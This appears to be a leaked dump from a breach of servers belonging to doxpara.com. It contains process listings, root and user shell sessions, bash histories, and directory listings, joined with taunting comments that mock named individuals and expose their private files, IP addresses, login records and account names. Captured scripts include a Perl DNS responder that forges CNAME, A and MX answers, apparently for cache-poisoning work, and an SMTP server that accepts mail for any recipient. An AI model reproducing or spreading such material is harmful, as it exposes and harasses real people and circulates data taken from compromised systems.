rndc.core drwxr-xr-x 7 root wheel 1024 May 10 07:08 root drwxr-xr-x 2 root wheel 3072 Jul 22 2008 sbin drwxr-xr-x 3 root wheel 512 Jul 17 2008 share lrwxr-xr-x 1 root wheel 11 Jul 22 2008 sys -> usr/src/sys drwxrwxrwt 17 root wheel 1536 Jul 20 08:40 tmp drwxr-xr-x 24 root wheel 512 Jul 23 2008 usr drwxr-xr-x 23 root wheel 512 May 5 13:49 var % ps ax PID TT STAT TIME COMMAND 0 ?? WLs 0:00.00 [swapper] 1 ?? SLs 1:27.55 /sbin/init -- 2 ?? DL 3:09.12 [g_event] 3 ?? DL 15:25.33 [g_up] 4 ?? DL 16:49.89 [g_down] 5 ?? DL 0:00.00 [thread taskq] 6 ?? DL 0:00.00 [acpi_task_0] 7 ?? DL 0:00.00 [acpi_task_1] 8 ?? DL 0:00.00 [acpi_task_2] 9 ?? DL 0:00.00 [xpt_thrd] 10 ?? DL 0:00.00 [audit] 11 ?? RL 107041:54.37 [idle: cpu0] 12 ?? WL 3:03.61 [swi1: net] 13 ?? 
WL 60:10.18 [swi4: clock sio] 14 ?? WL 0:00.00 [swi3: vm] 15 ?? DL 5:18.85 [yarrow] 16 ?? WL 0:00.00 [swi6: Giant taskq] 17 ?? WL 0:00.00 [swi6: task queue] 18 ?? WL 0:00.00 [swi2: cambio] 19 ?? DL 0:00.00 [kqueue taskq] 20 ?? WL 0:00.00 [swi5: +] 21 ?? WL 0:00.00 [irq9: acpi0] 22 ?? WL 0:00.00 [irq23: atapci0] 23 ?? WL 15:29.30 [irq22: atapci1] 24 ?? WL 0:00.00 [irq19: ohci0 ohci+] 25 ?? DL 0:00.36 [usb0] 26 ?? DL 0:00.00 [usbtask-hc] 27 ?? DL 0:00.00 [usbtask-dr] 28 ?? DL 0:00.23 [usb1] 29 ?? DL 0:00.39 [usb2] 30 ?? WL 0:00.00 [irq14: ata0] 31 ?? WL 0:00.00 [irq15: ata1] 32 ?? WL 83:33.79 [irq21: rl0] 33 ?? DL 9:31.22 [acpi_thermal] 34 ?? DL 0:03.56 [acpi_cooling0] 35 ?? WL 0:00.00 [swi0: sio] 36 ?? WL 0:00.00 [irq1: atkbd0] 37 ?? WL 0:00.00 [irq7: ppbus0 ppc0] 38 ?? DL 0:00.00 [sctp_iterator] 39 ?? DL 0:49.45 [pagedaemon] 40 ?? DL 0:00.00 [vmdaemon] 41 ?? DL 0:00.08 [pagezero] 42 ?? DL 0:28.93 [bufdaemon] 43 ?? DL 0:57.42 [vnlru] 44 ?? DL 157:57.51 [syncer] 45 ?? DL 3:21.70 [softdepflush] 137 ?? Is 0:00.00 adjkerntz -i 484 ?? Is 0:00.00 /sbin/devd 545 ?? Ss 7:37.79 /usr/sbin/syslogd -l /var/run/log -l /var/named/var/run/log -c 612 ?? Ss 3:46.39 /usr/local/sbin/named -u bind -c /etc/namedb/named.conf -t /var/named -u bind 757 ?? Ss 18:27.79 /usr/local/bin/spamd -c -d -r -d -r /var/run/spamd/spamd.pid (perl5.8.8) 796 ?? Ss 3:30.40 /usr/local/sbin/dovecot 800 ?? S 0:56.92 dovecot-auth 830 ?? Ss 4:14.31 /usr/local/sbin/httpd -D SSL 846 ?? Ss 5:24.13 /usr/sbin/sshd 862 ?? Ss 0:18.38 /usr/sbin/cron -s 1634 ?? I 0:00.58 /usr/local/sbin/httpd -D SSL 2329 ?? Is 0:00.04 sshd: crystal [priv] (sshd) 2331 ?? S 0:00.47 sshd: crystal at ttyp0 (sshd) 2897 ?? Ss 19:04.18 sendmail: accepting connections (sendmail) 2901 ?? Is 0:02.23 sendmail: Queue runner at 00:30:00 for /var/spool/clientmqueue (sendmail) 2976 ?? I 0:00.59 /usr/local/sbin/httpd -D SSL 2978 ?? I 0:00.75 /usr/local/sbin/httpd -D SSL 2979 ?? I 0:00.57 /usr/local/sbin/httpd -D SSL 4171 ?? 
I 0:00.40 /usr/local/sbin/httpd -D SSL 4173 ?? I 0:00.41 /usr/local/sbin/httpd -D SSL 4174 ?? I 0:00.37 /usr/local/sbin/httpd -D SSL 4175 ?? I 0:00.36 /usr/local/sbin/httpd -D SSL 4177 ?? I 0:00.43 /usr/local/sbin/httpd -D SSL 5880 ?? I 0:01.88 /usr/local/sbin/httpd -D SSL 5883 ?? I 0:01.81 /usr/local/sbin/httpd -D SSL 6790 ?? I 0:00.00 sendmail: server [122.50.138.199] cmd read (sendmail) 9957 ?? I 0:01.01 /usr/local/sbin/httpd -D SSL 9958 ?? I 0:01.05 /usr/local/sbin/httpd -D SSL 15274 ?? I 0:00.01 imap-login 17964 ?? Ss 0:00.19 sshd: root at ttyp4 (sshd) 19855 ?? Ss 0:00.02 sshd: [accepted] (sshd) 19856 ?? Ss 0:00.02 sshd: [accepted] (sshd) 19857 ?? S 0:00.01 sshd: [net] (sshd) 19858 ?? S 0:00.01 sshd: [net] (sshd) 36675 ?? Is 0:02.83 screen -D -R 39878 ?? I 1:02.49 spamd child (perl5.8.8) 41436 ?? I 0:00.20 /usr/local/sbin/httpd -D SSL 56971 ?? I 0:00.06 /usr/local/sbin/httpd -D SSL 57216 ?? I 0:00.17 /usr/local/sbin/httpd -D SSL 66304 ?? I 0:01.24 /usr/local/sbin/httpd -D SSL 68863 ?? I 0:00.31 /usr/local/sbin/httpd -D SSL 82722 ?? I 0:00.01 imap-login 83501 ?? I 0:00.19 /usr/local/sbin/httpd -D SSL 83937 ?? I 0:00.01 imap-login 87429 ?? I 0:00.47 /usr/local/sbin/httpd -D SSL 89035 ?? I 0:00.00 /bin/sh -c /usr/local/sbin/rotatelogs /var/log/httpd-error.log 604800 89036 ?? I 0:00.42 /usr/local/sbin/rotatelogs /var/log/httpd-error.log 604800 89037 ?? I 0:00.00 /bin/sh -c /usr/local/sbin/rotatelogs /var/log/httpd-access.log 86400 89038 ?? I 0:02.12 /usr/local/sbin/rotatelogs /var/log/httpd-access.log 86400 99329 ?? 
I 0:04.04 spamd child (perl5.8.8) 906 v0 Is+ 0:00.00 /usr/libexec/getty Pc ttyv0 907 v1 Is+ 0:00.00 /usr/libexec/getty Pc ttyv1 908 v2 Is+ 0:00.00 /usr/libexec/getty Pc ttyv2 909 v3 Is+ 0:00.00 /usr/libexec/getty Pc ttyv3 910 v4 Is+ 0:00.00 /usr/libexec/getty Pc ttyv4 911 v5 Is+ 0:00.00 /usr/libexec/getty Pc ttyv5 912 v6 Is+ 0:00.00 /usr/libexec/getty Pc ttyv6 913 v7 Is+ 0:00.00 /usr/libexec/getty Pc ttyv7 770 con- I 0:00.01 /bin/sh /usr/local/bin/mysqld_safe --defaults-extra-file=/usr/pmjm/db/my.cnf --user=mysql --datadir=/usr/pmjm/db --pid-file=/usr/pmjm/db/doxpara.com.pid 804 con- I 45:18.02 /usr/local/libexec/mysqld --defaults-extra-file=/usr/pmjm/db/my.cnf --basedir=/usr/local --datadir=/usr/pmjm/db --pid-file=/usr/pmjm/db/doxpara.com.pid 2333 p0 Ss+ 0:00.04 sh -c while [ 1 ] ; do echo 1864; sleep 60; done 19791 p0 S+ 0:00.00 sleep 60 36678 p1 Is+ 0:00.11 /usr/local/bin/bash 58554 p2 Is+ 0:00.04 /usr/local/bin/bash 37114 p3 Is 0:00.05 /usr/local/bin/bash 56230 p3 S+ 9:29.89 pine 17981 p4 Ss 0:00.07 -csh (csh) 19859 p4 R+ 0:00.00 ps ax

// Some random excerpts from another session...
// Jay Beale shows off elite nmap skillz in this .bash_history

exit ls cd .ssh/ ls cp authorized_hosts authorized_hosts2 exit cd .ssh/ ls man authorized_hosts mv authorized_hosts authorized_keys mv authorized_hosts2 authorized_keys2 exit ls rm -fr BitTorrent-3.4.2/ ls ssh jay at 24.19.18.11 ssh -p 49356 jay at 24.19.18.11 exit scp -P 49356 "jay at 24.19.18.11:*.tbz2" scp -P 49356 "jay at 24.19.18.11:*.tbz2" . 
ls rm *tbz2 ls exit su - ls #j exit nmap nmap -h mannmap man nmap nmap -sL 192.52.229.0/24 nmap -sL 192.58.37.0/22 nmap -sL 192.58.37.0/22 >192.58.37.0-slash-22.txt ls ftp ftplocal.dartmouth.edu exit last -i last | less man last man last last jay w ssh jay at techsec ssh jay at 129.170.18.249 %head 192.58.37.0-slash-22.txt Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-08-16 11:13 PDT Host 192.58.36.0 not scanned Host 192.58.36.1 not scanned Host 192.58.36.2 not scanned Host 192.58.36.3 not scanned Host 192.58.36.4 not scanned Host 192.58.36.5 not scanned Host 192.58.36.6 not scanned Host 192.58.36.7 not scanned %tail 192.58.37.0-slash-22.txt ^M Host 192.58.39.247 not scanned Host 192.58.39.248 not scanned Host 192.58.39.249 not scanned Host 192.58.39.250 not scanned Host 192.58.39.251 not scanned Host 192.58.39.252 not scanned Host 192.58.39.253 not scanned Host 192.58.39.254 not scanned Host 192.58.39.255 not scanned Nmap run completed -- 1024 IP addresses (0 hosts up) scanned in 133.227 seconds Is Dan auditing pine? If only. %file pine.core pine.core: ELF 32-bit LSB core file Intel 80386, version 1 (FreeBSD), FreeBSD-style, from 'pin' %echo oh shit, pine 0day^M oh shit, pine 0day // If you were paying attention you might have caught Dan looking for dating help -rwx------ 1 effugas wheel 19253 May 20 2007 Alpha Man Conversation & Persuasion.torrent -rwx------ 1 effugas wheel 18865 Nov 4 2006 David X Seduction and Relationships Seminar.torrent -rwx------ 1 effugas wheel 20767 Oct 24 2006 Juggler - Charisma Arts Bootcamp.avi.torrent -rwx------ 1 effugas wheel 28554 Nov 18 2006 PickUp 101 - He Said, She Said - Volume 1.torrent // Dan is gonna be an ALPHA MAN // WATCH OUT LADIES !~~~~~~~~~ backend.doxpara.com ~~~~~~~~! 
root at 209.40.204.174's password: Last login: Wed Jun 24 10:22:29 2009 from 88.79.237.13 root at ovz-test:~# uname -a; id Linux ovz-test 2.6.18-53.1.13.el5xen #1 SMP Tue Feb 12 14:04:18 EST 2008 i686 GNU/Linux uid=0(root) gid=0(root) groups=0(root) root at ovz-test:/root# ls -la total 36892 drwxr-xr-x 12 root root 4096 Jun 24 10:23 . drwxr-xr-x 21 root root 4096 Dec 22 2008 .. -rw-r--r-- 1 root root 15180 Jun 24 11:38 .bash_history -rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc drwxr-xr-x 3 root root 4096 Jun 16 16:54 .cpan drwx------ 2 root root 4096 Jun 24 10:24 .irssi -rw------- 1 root root 57 Apr 13 07:48 .lesshst -rw------- 1 root root 466 Dec 27 2008 .mysql_history -rw-r--r-- 1 root root 141 Oct 20 2007 .profile drwx------ 2 root root 4096 Dec 27 2008 .ssh -rw-r--r-- 1 root root 62682 Jun 7 21:36 Net-Twitter-3.01000.tar.gz drwxr-xr-x 5 500 500 4096 Dec 28 1999 SMTP-Server-1.1 -rw-r--r-- 1 root root 13166 Dec 29 1999 SMTP-Server-1.1.tar.gz drwxrwxr-x 9 10132 root 4096 Dec 22 2008 bind-9.2.9 -rw-r--r-- 1 root root 5477026 Sep 25 2007 bind-9.2.9.tar.gz drwxrwxr-x 9 10132 root 4096 Dec 25 2008 bind-9.4.1-P1 -rw-r--r-- 1 root root 6341409 Dec 25 2008 bind-9.4.1-P1.tar.gz drwxrwxrwx 13 root root 4096 Apr 15 00:17 expat-2.0.1 -rw-r--r-- 1 root root 446456 Jun 7 2007 expat-2.0.1.tar.gz -rw-r--r-- 1 root root 1725 Feb 15 20:12 huh -rw-r--r-- 1 root root 3363 Dec 22 2008 index.html?pkg=bind9%2F9.2.9%2Fbind-9.2.9.tar.gz -rw-r--r-- 1 root root 4404 Dec 22 2008 index.html?pkg=bind9%2F9.2.9%2Fbind-9.2.9.tar.gz&name=BIND 9.2.9 Source&noframes=1 -rw-r--r-- 1 root root 2927234 Mar 6 00:58 log -rw-r--r-- 1 root root 469 Feb 15 20:47 log2 -rw-r--r-- 1 root root 580907 Feb 15 20:37 log3 -rw-r--r-- 1 root root 1601803 Feb 15 22:06 mslog drwxrwxrwx 13 notroot notroot 4096 Apr 13 08:11 netatalk-2.0.3 -rw-r--r-- 1 root root 1471804 May 18 2005 netatalk-2.0.3.tar.bz2 -rw-r--r-- 1 root root 5751 Apr 4 2007 proxyfuzz.py -rw-r--r-- 1 root root 1780510 Mar 6 05:15 
tightvnc-1.3.10_unixsrc.tar.bz2 drwxr-xr-x 9 notroot notroot 4096 Apr 13 05:55 vnc_unixsrc drwx------ 11 root root 4096 Dec 26 2008 wireshark-1.0.5 -rw-r--r-- 1 root root 16861293 Dec 10 2008 wireshark-1.0.5.tar.gz root at ovz-test:/root# cat .bash_history dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com killall named named dig @127.0.0.1 ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 $RANDOM.ns1.toorrr.com dig @127.0.0.1 www.toorrr.com killall named dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com dig 
@deluvian.doxpara.com www.toorrr.com dig @deluvian.doxpara.com www.toorrr.com dig www.toorrr.com dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com any dig @127.0.0.1 ns1.toorrr.com killall named named dig @127.0.0.1 ns1.toorrr.com dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com type1337 dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com type1337 dig @127.0.0.1 foo.www.toorrr.com type1338 dig @127.0.0.1 foo.www.toorrr.com type1339 dig @127.0.0.1 foo.www.toorrr.com type1340 dig @127.0.0.1 foo.www.toorrr.com type1340 dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com type1340 dig @127.0.0.1 www.toorrr.com type1340 dig @127.0.0.1 www.toorrr.com type1341 dig @127.0.0.1 www.toorrr.com any dig @127.0.0.1 www.toorrr.com any dig @127.0.0.1 www.toorrr.com any dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com killall named named dig @127.0.0.1 $RANDOM.www.toorrr.com killall named named dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 www.toorrr.com killall named named dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com TYPE1337 dig @127.0.0.1 www.toorrr.com ANY dig @127.0.0.1 www.toorrr.com ANY dig @127.0.0.1 www.toorrr.com TYPE1337 dig @127.0.0.1 www.toorrr.com ANY dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig 
@127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx fg dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com any dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx tcpdump -n port 53 -w log tcpdump -n port 53 -s 2000 -w log tcpdump -vvv -r log tcpdump -vvv -r log | grep -i mx22 dig @127.0.0.1 mx22.toorrr.com +norecurse dig @127.0.0.1 mx22.toorrr.com any +norecurse dig @127.0.0.1 mx22.toorrr.com mx +norecurse dig @127.0.0.1 toorrr.com mx +norecurse dig @127.0.0.1 toorrr.com mx +norecurse dig @127.0.0.1 toorrr.com mx dig mx16.toorrr.com. dig mx17.toorrr.com any dig mx17.toorrr.com +norecurse dig @127.0.0.1 mx17.toorrr.com +norecurse killall named named screen -D -R screen -D -R ps -axf | grep perl exps -axf ps -axf | grep perl ps axf | grep -i named named screen -D -R dig foo.toorrr.com dig foo.toorrr.com dig foo.toorrr.com dig @127.0.0.1 $RANDOM.foo.toorrr.com dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX fg dig ns1.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.foo.toorrr.com dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 
root at ovz-test:/root# logout
Connection to 209.40.204.174 closed.
%w
8:45AM up 75 days, 11:54, 1 user, load averages: 0.18, 0.13, 0.09
USER TTY FROM LOGIN@ IDLE WHAT
crystal p0 76.14.85.220 6:47AM 1:58 sleep 60

!~~~~~~~~ attacker.doxpara.com ~~~~~~~~!
root at attacker.doxpara.com's password:
stdin: is not a tty
uname -a; id
Linux attacker 2.6.18-53.1.13.el5xen #1 SMP Tue Feb 12 14:04:18 EST 2008 i686 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
print;
my $ttl = 300;
if ($qtype eq "A" and $qname ne "ns1.toorrr.com") {
    push @ans, Net::DNS::RR->new("$qname $ttl $qclass CNAME www.doxpara.com");
    push @ans, Net::DNS::RR->new("$qname $ttl $qclass A 4.3.2.1");
    #push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 1.2.3.4");
    #push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 209.200.168.66");
    $rcode = "NOERROR";
} elsif ($qtype eq "A" and $qname eq "ns1.toorrr.com") {
    push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 1.2.3.4");
    push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 209.200.168.66");
    $rcode = "NOERROR";
}elsif( $qtype eq "MX" ) {
    push @ans, Net::DNS::RR->new("$qname $ttl $qclass $qtype 10 mail.$qname");
    push @add, Net::DNS::RR->new("mail.$qname $ttl $qclass A 209.40.204.236");
    $rcode = "NOERROR";
}else{
    $rcode = "NXDOMAIN";
}
# mark the answer as authoritative (by setting the 'aa' flag)
return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
}

my $ns = Net::DNS::Nameserver->new(
    LocalPort => 53,
    ReplyHandler => \&reply_handler,
    Verbose => 2,
) || die "couldn't create nameserver object\n";

$ns->main_loop;

head -n 10 dnsrake_hacdc.c
#define __FAVOR_BSD
#define FAVOR_BSD
#include
#include
#include
#include
#include
#include
#include

cat mail.pl
use IO::Socket::INET;
use Net::Server::Mail::SMTP;
use Data::Dumper;
use MIME::QuotedPrint;

my @local_domains = qw(example.com example.org);
my $server = new IO::Socket::INET Listen => 1, LocalPort => 25, ReuseAddr=>1;

my $conn;
while($conn = $server->accept) {
    my $smtp = new Net::Server::Mail::SMTP socket => $conn;
    $smtp->set_callback(RCPT => \&validate_recipient);
    $smtp->set_callback(DATA => \&queue_message);
    $smtp->process();
    $conn->close();
}

sub validate_recipient {
    my($session, $recipient) = @_;
    return(1);
}

sub queue_message {
    my($session, $data) = @_;
    print decode_qp($$data);
    return(1, 250, "message queued");
}

!~~~~~~~~~~~ www.doxpara.com ~~~~~~~~~~!
$ uname -a; id
FreeBSD shaitan1.lightconsulting.com 6.2-RELEASE-p4 FreeBSD 6.2-RELEASE-p4 #0: Thu Apr 26 17:40:53 UTC 2007 root at i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386
uid=80(www) gid=80(www) groups=80(www), 1001(thalakan), 1056(skippy)
$ pwd
/
2 test1 test1 512 Aug 26 2005 test1 drwxr-x--- 141 thalakan thalakan 26112 Jul 20 09:10 thalakan drwxr-xr-x 8 travis travis 512 May 2 2006 travis drwxr-xr-x 3 tspwh tspwh 512 Feb 1 2008 tspwh drwxr-xr-x 9 atheris atheris 1024 Sep 24 2007 unixsurplus drwxr-xr-x 2 unredo unredo 512 Mar 12 15:21 unredo drwxr-xr-x 2 root wheel 512 Mar 13 2005 v1ru5 drwxr-xr-x 3 vintasia vintasia 512 Jan 24 2002 vintasia drwxr-xr-x 2 visigoth visigoth 512 Jul 5 2003 visigoth drwxr-xr-x 2 wd40 wd40 2048 Sep 26 2007 wd40 drwxr-xr-x 7 x30n x30n 512 Nov 21 2006 x30n drwxr-xr-x 8 zahl zahl 1024 Jun 25 2002 zahl $ cd effugas $ ls -al total 9506018 -rw-r--r-- 1 effugas effugas 344 Feb 19 2006 ! drwxr-xr-x 31 effugas effugas 2048 Sep 22 2008 . drwxr-xr-x 73 root wheel 1536 Jun 26 04:56 .. drwx------ 3 effugas effugas 512 Sep 26 2005 .BitchX -rw------- 1 effugas effugas 7772 Jun 4 11:56 .bash_history drwxr-xr-x 5 effugas effugas 512 Oct 31 2005 .cpan -rw-r--r-- 1 effugas effugas 771 Aug 9 2002 .cshrc drwxr-xr-x 3 effugas effugas 512 Mar 16 2005 .emacs.d -rw------- 1 effugas effugas 42 Sep 22 2008 .lesshst drwx------ 2 effugas effugas 512 Feb 19 2006 .links -rw-r--r-- 1 effugas effugas 255 Aug 9 2002 .login -rw-r--r-- 1 effugas effugas 165 Aug 9 2002 .login_conf -rw------- 1 effugas effugas 371 Aug 9 2002 .mail_aliases -rw-r--r-- 1 effugas effugas 331 Aug 9 2002 .mailrc -rw------- 1 effugas effugas 5478 Jul 25 2008 .mysql_history -rw-r--r-- 1 effugas effugas 789 Aug 9 2002 .profile -rw------- 1 effugas effugas 276 Aug 9 2002 .rhosts -rw-r--r-- 1 effugas effugas 852 Aug 9 2002 .shrc drwxr-xr-x 2 effugas effugas 512 Aug 1 2004 .ssh -rw-r--r-- 1 effugas effugas 785514 Apr 3 2007 DSCF7896.JPG drwxr-xr-x 2 effugas effugas 512 Jun 28 2004 Desktop -rw-r--r-- 1 effugas effugas 62548 Nov 29 2005 HTTP-Proxy.tar.gz -rwxr-xr-x 1 effugas effugas 266 Jan 29 2005 OzyBench.pm -rwxr-xr-x 1 effugas effugas 8872 Jan 29 2005 OzyResolve.pm drwx------ 2 effugas effugas 512 Apr 14 2003 Pics drwxr-xr-x 2 effugas effugas 
512 Dec 20 2004 admin -rw-r--r-- 1 effugas effugas 0 Apr 16 2006 airhook-2.tar.gz lrwxr-xr-x 1 effugas effugas 26 Apr 16 2003 albums -> doxpara/pics/picKLE-albums -rw-r--r-- 1 effugas effugas 29884 Apr 27 2006 cal311.rle -rwx------ 1 effugas effugas 16384 Sep 30 2005 cc.doc -rw-r--r-- 1 effugas effugas 2272 Dec 20 2004 ctry_usage_200412.png -rw-r--r-- 1 effugas effugas 2501 Dec 20 2004 daily_usage_200412.png -rw-r--r-- 1 effugas effugas 9 Nov 19 2007 delete_this_plz_k_thx drwxr-xr-x 5 effugas effugas 512 May 29 2005 dltrace-0.5 -rw-r--r-- 1 effugas effugas 198330 Apr 28 2005 dltrace-0.5.tar.bz2 drwxrwxrwx 124 effugas effugas 28672 Jul 18 06:22 doxpara -rw-r--r-- 1 effugas effugas 753427 Oct 17 2007 drupal-5.3.tar.gz -rw-r--r-- 1 effugas effugas 1588 Dec 20 2004 hourly_usage_200412.png -rw-r--r-- 1 root effugas 216555114 Jul 20 09:10 httpd-doxpara-error.log -rw-r--r-- 1 root effugas 9452989787 Jul 20 09:10 httpd-doxpara.log drwxr-xr-x 2 effugas effugas 512 Jun 14 2005 huh -rw-r--r-- 1 effugas effugas 10138487 Nov 24 2007 huh.gz -rw-r--r-- 1 effugas effugas 104 Nov 24 2007 huh2.gz -rw-r--r-- 1 effugas effugas 18093548 Nov 24 2007 huh_new.gz -rw-r--r-- 1 effugas effugas 15748938 Nov 24 2007 huh_shai.gz -rw-r--r-- 1 effugas effugas 617 Jul 28 2003 id_dsa-dan_needs_to_drink_more.pub -rw-r--r-- 1 effugas effugas 236 Nov 14 2002 id_rsa.pub drwxr-xr-x 2 effugas effugas 512 Dec 25 2003 igi-udp -rw-r--r-- 1 effugas effugas 18720 Mar 24 2003 igi-udp.tgz -rw-r--r-- 1 effugas effugas 0 Sep 22 2008 index.html -rw-r--r-- 1 effugas effugas 6552 Apr 27 2006 input.pgm -rw-r--r-- 1 effugas effugas 19432 Apr 27 2006 input.ppm -rw-r--r-- 1 effugas effugas 10516 Apr 27 2006 input.rle drwx------ 2 effugas effugas 512 Sep 9 2005 mad_bike drwxr-xr-x 10 effugas effugas 1024 Nov 9 2002 minewt -rw-r--r-- 1 effugas effugas 10832895 Jul 8 2008 new2.db.gz drwxr-xr-x 2 effugas effugas 512 Feb 20 2006 offline drwxr-sr-x 2 effugas effugas 512 Sep 16 2003 onesixtyone-0.3.1 drwxr-xr-x 2 effugas 
effugas 512 Jan 19 2005 ozy2 -rwxr-xr-x 1 effugas effugas 437 Jan 29 2005 ozybench.pl drwxr-xr-x 4 effugas effugas 512 Dec 25 2003 pathchirp-2.3.3 -rw-r--r-- 1 effugas effugas 60375 Sep 13 2003 pathchirp-2.3.3.tar.gz drwxr-xr-x 3 effugas effugas 512 Jan 28 2005 pathchirp-2.3.7 -rw-r--r-- 1 effugas effugas 59321 Sep 6 2004 pathchirp-2.3.7.tar.gz drwxr-xr-x 3 effugas effugas 512 Oct 31 2005 perl drwxr-xr-x 3 effugas effugas 512 Feb 19 2006 py -rw-r--r-- 1 effugas effugas 37446 Nov 19 2002 ref -rw-r--r-- 1 effugas effugas 41381 Dec 7 2004 ref.txt -rw-r--r-- 1 effugas effugas 37446 Nov 19 2002 ref2 -rw-r--r-- 1 effugas effugas 65058 Nov 21 2002 ref3 -rw-r--r-- 1 effugas effugas 105868 Nov 26 2002 ref4 -rw-r--r-- 1 effugas effugas 125464 Dec 1 2002 ref5 drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 reply_here -rw-r--r-- 1 effugas effugas 36946 Apr 19 2005 sm_tool.py drwxr-xr-x 5 effugas effugas 512 Sep 26 2005 sqlite drwxr-xr-x 11 effugas effugas 2048 Sep 26 2005 sqlite-2.8.16 -rw-r--r-- 1 effugas effugas 981834 Sep 26 2005 sqlite-2.8.16.tar.gz drwxr-xr-x 4 effugas effugas 512 Sep 9 2005 stab-1.3.1 drwxr-xr-x 2 effugas effugas 512 Feb 11 2003 temp -rw-r--r-- 1 effugas effugas 61084 Nov 11 2000 test.rle -rw-r--r-- 1 effugas effugas 17 Mar 27 2006 test.txt 